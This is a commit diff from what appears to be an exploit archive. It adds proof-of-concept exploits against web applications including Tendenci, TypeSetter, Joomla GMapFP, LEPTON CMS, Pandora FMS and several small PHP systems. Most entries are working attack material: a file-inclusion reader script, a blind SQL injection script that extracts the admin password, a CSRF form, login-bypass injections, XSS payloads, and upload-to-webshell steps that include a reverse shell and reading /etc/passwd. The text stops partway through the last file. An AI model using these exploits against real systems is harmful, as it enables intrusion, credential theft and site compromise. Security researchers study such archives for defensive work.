DB: 2020-12-02
18 changes to exploits/shellcodes 10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH) EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path TypeSetter 5.1 - CSRF (Change admin e-mail) Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting Online Shopping Alphaware 1.0 - Error Based SQL injection Pharmacy/Medical Store & Sale Point 1.0 - 'email' SQL Injection Setelsa Conacwin 3.7.1.2 - Local File Inclusion Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting Medical Center Portal Management System 1.0 - 'login' SQL Injection Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020 Social Networking Site - Authentication Bypass (SQli) Tendenci 12.3.1 - CSV/ Formula Injection
This commit is contained in:
parent
216721f32c
commit
4b9e53700f
19 changed files with 964 additions and 0 deletions
29
exploits/multiple/webapps/49133.py
Executable file
29
exploits/multiple/webapps/49133.py
Executable file
|
@ -0,0 +1,29 @@
|
|||
# Exploit Title: Setelsa Conacwin 3.7.1.2 - Local File Inclusion
|
||||
# Date: 02/09/20
|
||||
# Exploit Author: Bryan Rodriguez Martin AKA tr3mb0
|
||||
# Vendor Homepage: http://setelsa-security.es/productos/control-de-acceso/
|
||||
# Version: 3.7.1.2
|
||||
# Tested on: Windows
|
||||
# FIX: The recommendation from the vendor is to update to the last version.
|
||||
|
||||
import requests
|
||||
import urllib.parse
|
||||
import colorama
|
||||
|
||||
from colorama import Fore, Style
|
||||
|
||||
ENDPOINT = "http://10.4.8.11:8081/"
|
||||
|
||||
while True:
|
||||
cmd = input(Fore.RED + "[*] FILE >> ")
|
||||
print(Style.RESET_ALL)
|
||||
|
||||
#cmd = urllib.parse.quote(cmd)
|
||||
ENDPOINT2 = ENDPOINT + "..%2F..%2F" + cmd
|
||||
|
||||
print("[*] Target >> " + ENDPOINT2)
|
||||
print(" ")
|
||||
r = requests.get(url = ENDPOINT2)
|
||||
|
||||
extract = r.text
|
||||
print(extract)
|
21
exploits/multiple/webapps/49145.txt
Normal file
21
exploits/multiple/webapps/49145.txt
Normal file
|
@ -0,0 +1,21 @@
|
|||
#Exploit Title: Tendenci 12.3.1 - CSV/ Formula Injection
|
||||
#Date: 2020-10-29
|
||||
#Exploit Author: Mufaddal Masalawala
|
||||
#Vendor Homepage: https://www.tendenci.com/
|
||||
#Software Link: https://github.com/tendenci/tendenci
|
||||
#Version: 12.3.1
|
||||
#Payload: =10+20+cmd|' /C calc'!A0
|
||||
#Tested on: Kali Linux 2020.3
|
||||
#Proof Of Concept:
|
||||
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
|
||||
Contact Us feature in Tendenci v12.3.1 via message field that is mistreated
|
||||
while exporting to a CSV file.
|
||||
To exploit this vulnerability:
|
||||
|
||||
1. Go to contact us page and enter the payload "=10+20+cmd|' /C
|
||||
calc'!A0" in the message field and submit the form
|
||||
2. Login to the application and go to Forms section and export the
|
||||
contact us form entries
|
||||
3. Click on Export and save the CSV file downloaded
|
||||
4. Open the CSV file, allow all popups and our payload is executed
|
||||
(calculator is opened).
|
68
exploits/php/webapps/49128.txt
Normal file
68
exploits/php/webapps/49128.txt
Normal file
|
@ -0,0 +1,68 @@
|
|||
# Exploit Title: TypeSetter 5.1 - CSRF (Change admin e-mail)
|
||||
# Exploit Author: Alperen Ergel
|
||||
# Software Homepage: https://www.typesettercms.com/
|
||||
# Version : 5.1
|
||||
# Tested on: Kali & ubuntu
|
||||
# Category: WebApp
|
||||
|
||||
######## Description ########
|
||||
|
||||
Attacker can change admin e-mail address
|
||||
|
||||
## Vulnerable
|
||||
|
||||
- Go to the admin page view preferences
|
||||
- Change the e-mail address
|
||||
|
||||
######## Proof of Concept ########
|
||||
|
||||
===> REQUEST <====
|
||||
POST /typesetter/Admin/Preferences HTTP/1.1
|
||||
Host: http://localhost/
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 237
|
||||
Origin: http://localhost/
|
||||
Connection: close
|
||||
Referer: http://localhost/typesetter/Admin/Preferences
|
||||
|
||||
## < SNIPP >
|
||||
|
||||
|
||||
verified=6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c
|
||||
&email=demo%40mail.com&oldpassword=&password=&password1=&algo=password_hash&cmd=changeprefs&aaa=Save
|
||||
|
||||
#### Attack Code ####
|
||||
|
||||
<html>
|
||||
|
||||
<body>
|
||||
|
||||
<form action="http://localhost/typesetter/Admin/Preferences" method="POST">
|
||||
|
||||
<input type="hidden" name="verified" value="6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c" />
|
||||
|
||||
<input type="hidden" name="email" value="[CHANGE HERE]" />
|
||||
|
||||
<input type="hidden" name="oldpassword" value="" />
|
||||
|
||||
<input type="hidden" name="password" value="" />
|
||||
|
||||
<input type="hidden" name="password1" value="" />
|
||||
|
||||
<input type="hidden" name="algo" value="password_hash" />
|
||||
|
||||
<input type="hidden" name="cmd" value="changeprefs" />
|
||||
|
||||
<input type="hidden" name="aaa" value="Save" />
|
||||
|
||||
<input type="submit" value="Submit request" />
|
||||
|
||||
</form>
|
||||
|
||||
</body>
|
||||
|
||||
</html>
|
32
exploits/php/webapps/49129.txt
Normal file
32
exploits/php/webapps/49129.txt
Normal file
|
@ -0,0 +1,32 @@
|
|||
# Exploit Title: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload
|
||||
# Google Dork: inurl:''com_gmapfp''
|
||||
# Date: 2020-03-27
|
||||
# Exploit Author: ThelastVvV
|
||||
# Vendor Homepage: https://gmapfp.org/
|
||||
# Version:Version J3.5 /J3.5free
|
||||
# Tested on: Ubuntu
|
||||
# CVE: CVE-2020-23972
|
||||
|
||||
# Description:
|
||||
|
||||
An attacker can access the upload function of the application without authenticating to the application and also can upload files due the issues of unrestricted file uploads which can be bypassed by changing the content-type and name file too double extensions
|
||||
|
||||
# PoC:
|
||||
|
||||
|
||||
Version J3.5
|
||||
http://127.0.0.1/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload
|
||||
|
||||
-Once the attacker can locate the unauthenticated file upload form then the attacker can bypass the restriction by changing content-type and name file double extensions file.html.gif then can open file.html
|
||||
|
||||
# Impact
|
||||
the attacker can upload malicious files can cause defacement of the site or uploading large amount of file til causes denial of service attack to Webapp/Server
|
||||
|
||||
# Dir File Path:
|
||||
http://127.0.0.1///images/stories/gmapfp/test.html.gif
|
||||
http://127.0.0.1///images/stories/gmapfp/test.html
|
||||
http://127.0.0.1///images/gmapfp/test2.html.gif
|
||||
http://127.0.0.1///images/gmapfp/test2.html.gif
|
||||
|
||||
|
||||
# Issues are fixed,Please update to Last Version
|
80
exploits/php/webapps/49130.py
Executable file
80
exploits/php/webapps/49130.py
Executable file
|
@ -0,0 +1,80 @@
|
|||
# Exploit Title: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting
|
||||
# Date: 27.11.2020
|
||||
# Exploit Author: b3kc4t (Mustafa GUNDOGDU)
|
||||
# Vendor Homepage: https://www.myeventon.com/
|
||||
# Version: 3.0.5
|
||||
# Tested on: Ubuntu 18.04
|
||||
# CVE : 2020-29395
|
||||
# Description Link:
|
||||
https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
|
||||
|
||||
"""
|
||||
~ VULNERABLITY DETAILS ~
|
||||
|
||||
https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>
|
||||
|
||||
#
|
||||
WordPress sites that use EventOn Calendar cause reflected xss vulnerability to javascript payloads injected
|
||||
into the search field.
|
||||
|
||||
#
|
||||
The following python code will inject javascript code and print out url that will be sent to victim.
|
||||
If you use unicode caracters for xss , exploit will print page source.
|
||||
|
||||
##USAGE##
|
||||
|
||||
$ sudo python eventon_exploit.py --exploit --url https://target/addons/?q= --payload '<svg/onload=alert(/b3kc4t/)>'
|
||||
|
||||
##OUTPUT##
|
||||
|
||||
[+] https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>
|
||||
|
||||
|
||||
"""
|
||||
import requests
|
||||
import sys
|
||||
import argparse
|
||||
from colorama import Fore
|
||||
|
||||
def vuln_reflected(url, payload):
|
||||
|
||||
s = requests.Session()
|
||||
get_request = s.get(url+payload)
|
||||
|
||||
if get_request.status_code == 500:
|
||||
print(Fore.GREEN+"[-] COULD BE WAF, NOT BE REALIZED XSS INJECTION [-]")
|
||||
|
||||
else:
|
||||
content_result = str(get_request.content)
|
||||
search_find = content_result.find(payload)
|
||||
|
||||
if search_find != -1:
|
||||
print(Fore.GREEN+"[+] "+str(url)+str(payload))
|
||||
|
||||
else:
|
||||
|
||||
print(content_result)
|
||||
|
||||
|
||||
def main():
|
||||
|
||||
desc = "Wordpress EventON Calendar Plugin XSS"
|
||||
parser = argparse.ArgumentParser(description=desc)
|
||||
exp_option = parser.add_argument_group('')
|
||||
parser.add_argument("--exploit", help ="", action='store_true')
|
||||
parser.add_argument("--url",help="", type=str, required=False)
|
||||
parser.add_argument("--payload",help="",type=str,required=False)
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
if args.exploit:
|
||||
|
||||
if args.url:
|
||||
|
||||
if args.payload:
|
||||
url = args.url
|
||||
payload = args.payload
|
||||
vuln_reflected(url, payload)
|
||||
|
||||
if name == 'main':
|
||||
main()
|
11
exploits/php/webapps/49131.txt
Normal file
11
exploits/php/webapps/49131.txt
Normal file
|
@ -0,0 +1,11 @@
|
|||
# Title: Online Shopping Alphaware 1.0 - Error-Based SQL injection
|
||||
# Exploit Author: Moaaz Taha (0xStorm)
|
||||
# Date: 2020-08-20
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
|
||||
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql# Version: 1.0
|
||||
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
|
||||
# Description
|
||||
This parameter "id" is vulnerable to Error-Based blind SQL injection in this path "/alphaware/details.php?id=431860" that leads to retrieve all databases.
|
||||
|
||||
#POC
|
||||
sqlmap -u "http://192.168.1.55:8888/alphaware/details.php?id=431860" -p id --dbms=mysql --dbs --technique=E --threads=10
|
83
exploits/php/webapps/49132.py
Executable file
83
exploits/php/webapps/49132.py
Executable file
|
@ -0,0 +1,83 @@
|
|||
# Exploit Title: Pharmacy/Medical Store & Sale Point 1.0 - 'email' SQL Injection
|
||||
# Date: 2020-08-23
|
||||
# Exploit Author: @naivenom
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14398/pharmacymedical-store-sale-point-using-phpmysql-bootstrap-framework.html
|
||||
# Software Link: https://www.sourcecodester.com/download-code?nid=14398&title=Pharmacy%2FMedical+Store+%26+Sale+Point+Using+PHP%2FMySQL+with+Bootstrap+Framework
|
||||
# Version: 1.0
|
||||
# Tested on: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
|
||||
|
||||
This parameter "email" is vulnerable to Time-Based blind SQL injection
|
||||
in this path "/medical/login.php " that leads to retrieve all
|
||||
databases.
|
||||
|
||||
#exploit
|
||||
|
||||
import re
|
||||
import requests
|
||||
from bs4 import BeautifulSoup
|
||||
import sys
|
||||
import urllib3
|
||||
import time
|
||||
|
||||
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
||||
|
||||
# We can test the time based blind sqli with this script. This script
|
||||
testing with each character of the password column from users name
|
||||
table
|
||||
|
||||
# and retrieve password from admin user.
|
||||
|
||||
def time_based_blind_sqli(injection_string):
|
||||
|
||||
target = "http://localhost:81/medical-store-source/login.php"
|
||||
|
||||
for j in range(32,126):
|
||||
|
||||
data = {'email': "%s" % (injection_string.replace("[CHAR]", str(j))),
|
||||
|
||||
'password':'xJXb',
|
||||
|
||||
'login':''}
|
||||
|
||||
tim = time.time()
|
||||
|
||||
r = requests.post(target,data = data, verify=False)
|
||||
|
||||
nowtime = time.time()
|
||||
|
||||
curren = nowtime-tim
|
||||
|
||||
if curren <= 4:
|
||||
|
||||
return j
|
||||
|
||||
return None
|
||||
|
||||
def main():
|
||||
|
||||
print("\n(+) Retrieving password from admin user...")
|
||||
|
||||
# 5 is length of the password. This can
|
||||
|
||||
# be dynamically stolen from the database as well!
|
||||
|
||||
for i in range(1,5):
|
||||
|
||||
injection_string = "admin@admin.com' AND (SELECT 1100 FROM
|
||||
(SELECT(SLEEP(4-(IF(ORD(MID((SELECT IFNULL(CAST(password AS
|
||||
NCHAR),0x20) FROM store.users ORDER BY password LIMIT
|
||||
0,1),%d,1))>[CHAR],0,1)))))soLu) AND 'yHIV'='yHIV" % i
|
||||
|
||||
extracted_char = chr(time_based_blind_sqli(injection_string))
|
||||
|
||||
sys.stdout.write(extracted_char)
|
||||
|
||||
sys.stdout.flush()
|
||||
|
||||
print("\n(+) done!")
|
||||
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
main()
|
115
exploits/php/webapps/49135.txt
Normal file
115
exploits/php/webapps/49135.txt
Normal file
|
@ -0,0 +1,115 @@
|
|||
# Exploit Title: Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS
|
||||
# Date: 01-11-2020
|
||||
# Exploit Author: yunaranyancat
|
||||
# Vendor Homepage: https://www.sourcecodester.com
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
|
||||
# Version: 1.0
|
||||
# Tested on: Ubuntu 18.04 + XAMPP 7.4.11
|
||||
|
||||
Summary:
|
||||
|
||||
Multiple Persistent Cross-site Scripting in Multi Restaurant Table Reservation System allows attacker to gain sensitive information using these vulnerabilities.
|
||||
|
||||
# POC No.1
|
||||
Persistent XSS vulnerability at /dashboard/profile.php triggered by adding payload in Restaurant Name field
|
||||
|
||||
### Sample request POC #1
|
||||
|
||||
POST /TableReservation/dashboard/profile.php HTTP/1.1
|
||||
Host: [TARGET URL/IP]
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://[TARGET URL/IP]/TableReservation/dashboard/profile.php
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 122
|
||||
Cookie: PHPSESSID=0095837d1f0f69aa6c35a0bf2f70193c
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
fullname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&email=lol%40lol&phone=123456789&area=1&address=lol&password=lol&save=Save
|
||||
|
||||
# POC No.2
|
||||
Persistent XSS vulnerability at /dashboard/table-list.php triggered by adding payload in Table Name field in table-add.php
|
||||
|
||||
### Sample request POC #2
|
||||
|
||||
POST /TableReservation/dashboard/manage-insert.php HTTP/1.1
|
||||
Host: [TARGET URL/IP]
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://[TARGET URL/IP]/TableReservation/dashboard/table-add.php
|
||||
Content-Type: multipart/form-data; boundary=---------------------------424640138424818065256966622
|
||||
Content-Length: 321
|
||||
Cookie: PHPSESSID=d464c277434e6f2cf4358f59a368b090
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
-----------------------------424640138424818065256966622
|
||||
Content-Disposition: form-data; name="tablename"
|
||||
|
||||
<script>alert("XSS")</script>
|
||||
-----------------------------424640138424818065256966622
|
||||
Content-Disposition: form-data; name="addtable"
|
||||
|
||||
Add Table
|
||||
-----------------------------424640138424818065256966622--
|
||||
|
||||
|
||||
# POC No. 3
|
||||
Persistent XSS vulnerability at /dashboard/menu-list.php triggered by adding payload in Item Name field in menu-add.php
|
||||
|
||||
# POC No. 4
|
||||
Persistent XSS vulnerability at /dashboard/menu-list.php triggered by adding payload in Made by field in menu-add.php
|
||||
|
||||
# POC No. 5
|
||||
Persistent XSS vulnerability at /dashboard/menu-list.php triggered by modifying value of Area(food_type) dropdown to XSS payload in menu-add.php
|
||||
|
||||
### Sample request POC #3, #4 & #5
|
||||
|
||||
POST /TableReservation/dashboard/manage-insert.php HTTP/1.1
|
||||
Host: [TARGET URL/IP]
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://[TARGET URL/IP]/TableReservation/dashboard/menu-add.php
|
||||
Content-Type: multipart/form-data; boundary=---------------------------165343425917898292661480081499
|
||||
Content-Length: 6641
|
||||
Cookie: PHPSESSID=d464c277434e6f2cf4358f59a368b090
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
-----------------------------165343425917898292661480081499
|
||||
Content-Disposition: form-data; name="itemname"
|
||||
|
||||
<script>alert("XSS1")</script>
|
||||
-----------------------------165343425917898292661480081499
|
||||
Content-Disposition: form-data; name="price"
|
||||
|
||||
1
|
||||
-----------------------------165343425917898292661480081499
|
||||
Content-Disposition: form-data; name="madeby"
|
||||
|
||||
<svg onload=alert("XSS2")>
|
||||
-----------------------------165343425917898292661480081499
|
||||
Content-Disposition: form-data; name="food_type"
|
||||
|
||||
<svg onload=prompt("XSS4")>
|
||||
-----------------------------165343425917898292661480081499
|
||||
Content-Disposition: form-data; name="image"; filename="image.jpeg"
|
||||
Content-Type: image/jpeg
|
||||
|
||||
..
|
||||
[REDACTED CONTENT OF image.jpeg]
|
||||
..
|
||||
|
||||
----------------------------165343425917898292661480081499
|
||||
Content-Disposition: form-data; name="addItem"
|
||||
|
||||
Add Item
|
||||
-----------------------------165343425917898292661480081499--
|
28
exploits/php/webapps/49136.txt
Normal file
28
exploits/php/webapps/49136.txt
Normal file
|
@ -0,0 +1,28 @@
|
|||
# Exploit Title: Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution
|
||||
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
|
||||
# Date: 2020-09-18
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
|
||||
# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
|
||||
# Affected Version: Version 1
|
||||
# Category: Web Application
|
||||
# Tested on: Parrot OS
|
||||
|
||||
Step 1: Log in to the CMS with any valid user credentials.
|
||||
Step 2: Select Measurement Settings and click on "Set Measurement Parts".
|
||||
Step 3: Create any php payload on locally on your system. ( i used the default php webshell in /usr/share/webshells/php/php-reverse-shell.php)
|
||||
Step 4: Fill the required details and upload the php payload you created using the image upload field.
|
||||
Step 5: Select Measurement Settings and click on "View/Edit Measurement Parts".
|
||||
Step 6: Start netcat listener.
|
||||
Step 7: Use the search filter to find your measurement and click on "edit" to trigger the php payload.
|
||||
|
||||
========================== OR ==========================
|
||||
|
||||
Step 1: Embed an image with the code "exiftool -Comment='<?php system($_GET['cmd']); ?>' r0b0t.jpg"
|
||||
Step 2: Rename the malicious image to have include a ".php" extention. Example ( mv r0b0t.jpg r0b0t.jpg.php )
|
||||
Step 3: Log in to the CMS with any valid user credentials.
|
||||
Step 4: Select Measurement Settings and click on "Set Measurement Parts".
|
||||
Step 5: Fill the required details and upload malicious image you created using the image upload field.
|
||||
Step 6: Select Measurement Settings and click on "View/Edit Measurement Parts".
|
||||
Step 7: Use the search filter to find your measurement and click on "edit" to edit details.
|
||||
Step 8: Righ click on the broken image and copy image location.
|
||||
Step 9: Paste image location in browser and you will have RCE. ( http://localhost/img/part/r0b0t.jpg.php?cmd=cat /etc/passwd )
|
40
exploits/php/webapps/49137.txt
Normal file
40
exploits/php/webapps/49137.txt
Normal file
|
@ -0,0 +1,40 @@
|
|||
# Exploit Title: LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting
|
||||
# Date: 19-11-2020
|
||||
# Exploit Author: Sagar Banwa
|
||||
# Vendor Homepage: https://lepton-cms.org/
|
||||
# Software Link: https://lepton-cms.org/english/download/archive.php
|
||||
# Version: 4.7.0
|
||||
# Tested on: Windows 10/Kali Linux
|
||||
|
||||
Stored Cross-site scripting(XSS):
|
||||
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
|
||||
|
||||
Vulnerable Parameters: Pages URL.
|
||||
|
||||
Steps-To-Reproduce:
|
||||
1. Login to the Admin Account
|
||||
2. Go to the Menu-Pages-Pages Overview.
|
||||
3. Now edit any page
|
||||
4. Put the below payload in the url input box.
|
||||
5.ex. https://localhost/_packinstall/"onmouseover=prompt(/xss/)>
|
||||
|
||||
POST /LEPTONmvkzycfafg/modules/wrapper/save.php?leptoken=a8274f4a99bb3c2d1d857z1606411062 HTTP/1.1
|
||||
Host: localhost
|
||||
Connection: close
|
||||
Content-Length: 130
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: https://localhost
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-User: ?1
|
||||
Sec-Fetch-Dest: document
|
||||
Referer: https://localhost/LEPTONmvkzycfafg/backend/pages/modify.php?page_id=1&leptoken=33bfc986e094ce5dd7655z1606411059
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
|
||||
Cookie: lep5031sessionid=75627dd11a0e789c4e560f7a93cd3153
|
||||
|
||||
page_id=1§ion_id=1&url=https%3A%2F%2Flocalhost%2F_packinstall%2F%22onmouseover%3Dprompt%28%2Fxss%2F%29%3E+&height=900
|
31
exploits/php/webapps/49138.txt
Normal file
31
exploits/php/webapps/49138.txt
Normal file
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: Medical Center Portal Management System 1.0 - 'login' SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 2020-11-26
|
||||
# Exploit Author: Aydın Baran Ertemir
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html
|
||||
# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: Kali Linux
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# http://localhost/medic/pages/login.php
|
||||
#
|
||||
POST /medic/pages/processlogin.php HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
|
||||
Firefox/78.0
|
||||
Accept:
|
||||
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 57
|
||||
Origin: http://localhost
|
||||
Connection: close
|
||||
Referer: http://localhost/medic/pages/login.php
|
||||
Cookie: PHPSESSID=ef7226c5aa187ed19ce1815df30e079e
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
user=1%27+or+1%3D1%23&password=1%27+or+1%3D1%23&btnlogin=
|
110
exploits/php/webapps/49139.txt
Normal file
110
exploits/php/webapps/49139.txt
Normal file
|
@ -0,0 +1,110 @@
|
|||
# Exploit Title: Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities
|
||||
# Date: 11-14-2020
|
||||
# Exploit Author: Matthew Aberegg
|
||||
# Vendor Homepage: https://pandorafms.com/
|
||||
# Software Link: https://pandorafms.com/community/get-started/
|
||||
# Version: Pandora FMS 7.0 NG 749
|
||||
# Tested on: Ubuntu 18.04
|
||||
|
||||
|
||||
# Vulnerability Details
|
||||
# Description : A persistent cross-site scripting vulnerability exists in the "Edit OS" functionality of Pandora FMS.
|
||||
# Vulnerable Parameters : name, description
|
||||
# Patch Link : https://github.com/pandorafms/pandorafms/commit/58f521e8b570802fa33c75f99586e5b01b06731b
|
||||
|
||||
|
||||
#POC
|
||||
|
||||
POST /pandora_console/index.php?sec=gsetup&sec2=godmode/setup/os&tab=builder HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 132
|
||||
Origin: http://TARGET
|
||||
Connection: close
|
||||
Referer: http://TARGET/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/os&tab=builder
|
||||
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
name=%3Csvg%2Fonload%3Dalert%281%29%3E&description=%3Csvg%2Fonload%3Dalert%281%29%3E&icon=0&id_os=0&action=save&update_button=Create
|
||||
|
||||
|
||||
############################################################################################################
|
||||
|
||||
# Vulnerability Details
|
||||
# Description : A persistent cross-site scripting vulnerability exists in the "Private Enterprise Numbers" functionality of Pandora FMS.
|
||||
# Vulnerable Parameters : manufacturer, description
|
||||
# Patch Link : https://github.com/pandorafms/pandorafms/commit/b9b94e1382f6e340fd9f3136972cca4373f00eb0
|
||||
|
||||
|
||||
#POC
|
||||
|
||||
POST /pandora_console/ajax.php HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
|
||||
Accept: text/html, */*; q=0.01
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: multipart/form-data; boundary=---------------------------195778570630678476283866516641
|
||||
Content-Length: 846
|
||||
Origin: http://TARGET
|
||||
Connection: close
|
||||
Referer: http://TARGET/pandora_console/index.php?sec=templates&sec2=godmode/modules/private_enterprise_numbers
|
||||
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
|
||||
|
||||
-----------------------------195778570630678476283866516641
|
||||
Content-Disposition: form-data; name="is_new"
|
||||
|
||||
1
|
||||
-----------------------------195778570630678476283866516641
|
||||
Content-Disposition: form-data; name="page"
|
||||
|
||||
godmode/modules/private_enterprise_numbers
|
||||
-----------------------------195778570630678476283866516641
|
||||
Content-Disposition: form-data; name="method"
|
||||
|
||||
add
|
||||
-----------------------------195778570630678476283866516641
|
||||
Content-Disposition: form-data; name="pen"
|
||||
|
||||
123
|
||||
-----------------------------195778570630678476283866516641
|
||||
Content-Disposition: form-data; name="manufacturer"
|
||||
|
||||
<img src=a onerror=alert(1)>
|
||||
-----------------------------195778570630678476283866516641
|
||||
Content-Disposition: form-data; name="description"
|
||||
|
||||
<img src=a onerror=alert(1)>
|
||||
-----------------------------195778570630678476283866516641--
|
||||
|
||||
|
||||
############################################################################################################
|
||||
|
||||
# Vulnerability Details
|
||||
# Description : A persistent cross-site scripting vulnerability exists in the "Module Template Management" functionality of Pandora FMS.
|
||||
# Vulnerable Parameters : name, description
|
||||
# Patch Link : https://github.com/pandorafms/pandorafms/commit/e833c318a5a91d6d709a5b266c1245261b4c0e70
|
||||
|
||||
|
||||
# POC
|
||||
|
||||
POST /pandora_console/index.php?sec=gmodules&sec2=godmode/modules/manage_module_templates HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
